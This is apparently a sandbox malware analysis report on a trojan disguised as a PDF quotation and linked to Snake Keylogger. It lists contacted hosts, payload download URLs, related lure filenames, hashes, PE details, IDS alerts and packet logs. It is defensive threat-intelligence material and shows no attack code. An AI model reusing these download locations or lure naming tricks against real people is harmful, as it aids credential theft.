https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955F8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589561E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589560B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895632000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	false		high
http://filetransfer.io	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s24.filetransfer.io	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA33C6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dapper-plus.net	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	aspnet_compiler.exe, 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	filetransfer.io	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	s24.filetransfer.io	European Union	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557528
Start date and time:	2024-11-18 11:44:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe renamed because original name is a hash value
Original Sample Name:	QUOTATION_NOVQTRA071244PDF.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 76% Number of executed functions: 251 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, PID 828 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
05:45:05	API Interceptor	33584x Sleep call for process: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe modified
05:45:57	API Interceptor	166503x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/YU1NN
	TT copy.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/iiEh1iM3/download
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/dc8Ru
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/LOToW
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php
188.114.96.3	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/7pdXjNKP/download
	gusetup.exe	Get hash	malicious	Unknown	Browse	go.glarysoft.com/g/t/releasenotes/cn/10000/s/Glary%20Utilities/v/6.16.0.20
	BlgAsBdkiD.exe	Get hash	malicious	FormBook	Browse	www.vrxlzluy.shop/d8g5/
	Facebook_Advertiser_Position_Description.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1	Get hash	malicious	Unknown	Browse	graylinelaketahoe.com/
	View Pdf Doc_a42d45ecadd4b9604949c99fe71e46fe.htm	Get hash	malicious	Unknown	Browse	jssqm.nhgrt.top/WjBkrg/34JSSQm34?&&2yq=bC5zY2FybGF0ZWxsaUBhbG1hdml2YS5pdA%3D%3D
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	www.rtpwslot888gol.sbs/7arg/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Revised invoice.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	rFACTURASALBARANESPENDIENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	01831899-1 FDMS3008SDC.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rCEMG242598.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
s24.filetransfer.io	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr	Get hash	malicious	FormBook	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
filetransfer.io	rBankRemittance_pdf.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.200.96
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Benefits_Update_2024.pdf	Get hash	malicious	Unknown	Browse	172.67.189.16
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	Benefits_Update_2024.pdf	Get hash	malicious	Unknown	Browse	172.67.189.16
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDF	Get hash	malicious	Unknown	Browse	104.17.25.14
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg	Get hash	malicious	Mint Stealer	Browse	1.1.1.1
	http://updatechrome.duckdns.org/1234567890.functions	Get hash	malicious	Unknown	Browse	1.1.1.1
	Revised invoice.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
CLOUDFLARENETUS	Benefits_Update_2024.pdf	Get hash	malicious	Unknown	Browse	172.67.189.16
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	Benefits_Update_2024.pdf	Get hash	malicious	Unknown	Browse	172.67.189.16
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDF	Get hash	malicious	Unknown	Browse	104.17.25.14
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg	Get hash	malicious	Mint Stealer	Browse	1.1.1.1
	http://updatechrome.duckdns.org/1234567890.functions	Get hash	malicious	Unknown	Browse	1.1.1.1
	Revised invoice.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
UTMEMUS	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	01831899-1 FDMS3008SDC.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO NO170300999.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	z25Solicituddecotizacion.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Ziraat#U00a0Bankas#U0131 swift mesaji_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Transaction_copy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	RFQ for WIKA_pdf.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	DHL Delivery Invoice.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Revised invoice.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	rFACTURASALBARANESPENDIENTES.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	01831899-1 FDMS3008SDC.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rCEMG242598.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Pagamento,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Benefits_Update_2024.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	Richiesta Proposta (MACHINES ITALIA) 18-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3 188.114.96.3
	GD7656780000.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	Cryptbot	Browse	188.114.97.3 188.114.96.3
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	188.114.97.3 188.114.96.3
	Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	01831899-1 FDMS3008SDC.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	bose18mkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	188.114.97.3 188.114.96.3

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.9052726138080684
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
File size:	1'484'288 bytes
MD5:	9c6de69b3f4bd16dc76a37fd8a50aea4
SHA1:	a5c6f87a637a6e5ffd073dc90a3cbfa0591160c1
SHA256:	137ad88b1c43f6aa6f01b9b8a7b15027387d501dbe7af463a7b639f5abf3f116
SHA512:	255dbc20c850d91eaccbe338b99ef1e144af703e6bc88c70f8d8d0f6dd2089cbbc6ddb2f8b4dccd6770c75bc21176ae41566eb995d58645ae0a86d42ef1d3841
SSDEEP:	12288:Yx093lfiCZNsgg/iUZ0vXTWyzopB2QrJ30Bme47vAn+TbzeB:YIiFzj+vXhzop5rJ3gmYSe
TLSH:	2A652A0923E96A24D5BE8B376AF1481487B3B143D3E1DB9B4ED4B8E994437647E4C323
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....:g.........."...................... ....@...... ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673AEADF [Mon Nov 18 07:21:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16c000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x169cbc	0x169e00	81c567a1a631d65eb511a650eac2fc2e	False	0.33393377590673573	data	5.906706052366836	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16c000	0x600	0x600	ec91026c07e71e7297566b1a9fb90cb1	False	0.4290364583333333	data	4.220244673683194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x16c0a0	0x360	data			0.41550925925925924
RT_MANIFEST	0x16c400	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T11:45:57.617740+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49936	132.226.247.73	80	TCP
2024-11-18T11:45:58.727134+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49936	132.226.247.73	80	TCP
2024-11-18T11:45:59.449929+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49950	188.114.96.3	443	TCP
2024-11-18T11:46:01.602260+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49955	132.226.247.73	80	TCP
2024-11-18T11:46:02.300860+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49970	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 11:45:06.220190048 CET	49704	80	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:06.225357056 CET	80	49704	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:06.225466967 CET	49704	80	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:06.226984024 CET	49704	80	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:06.231885910 CET	80	49704	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:07.504254103 CET	80	49704	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:07.516551971 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:07.516644955 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:07.516727924 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:07.555221081 CET	49704	80	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:07.694122076 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:07.694202900 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:08.449564934 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:08.449846983 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:08.453845024 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:08.453902006 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:08.454334974 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:08.506469011 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:08.547368050 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:09.262505054 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:09.262831926 CET	443	49705	188.114.97.3	192.168.2.5
Nov 18, 2024 11:45:09.263067961 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:09.297985077 CET	49705	443	192.168.2.5	188.114.97.3
Nov 18, 2024 11:45:09.311696053 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:09.311743975 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:09.311817884 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:09.312274933 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:09.312288046 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:10.011816025 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:10.011925936 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:10.107038021 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:10.107079029 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:10.108087063 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:10.124727011 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:10.171339035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.078656912 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.078823090 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.078918934 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.078948021 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.078973055 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.079015970 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.079021931 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.079154968 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.079201937 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.079207897 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.079343081 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.079399109 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.079404116 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.133498907 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.133510113 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.180227041 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.195427895 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195513010 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195549011 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195597887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195620060 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.195631981 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195643902 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.195672035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195707083 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195712090 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.195717096 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.195759058 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.196317911 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.196399927 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.196444988 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.196445942 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.196455002 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.196496964 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.196501017 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.197279930 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.197321892 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.197335005 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.197339058 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.197381020 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.205046892 CET	443	49706	188.114.96.3	192.168.2.5
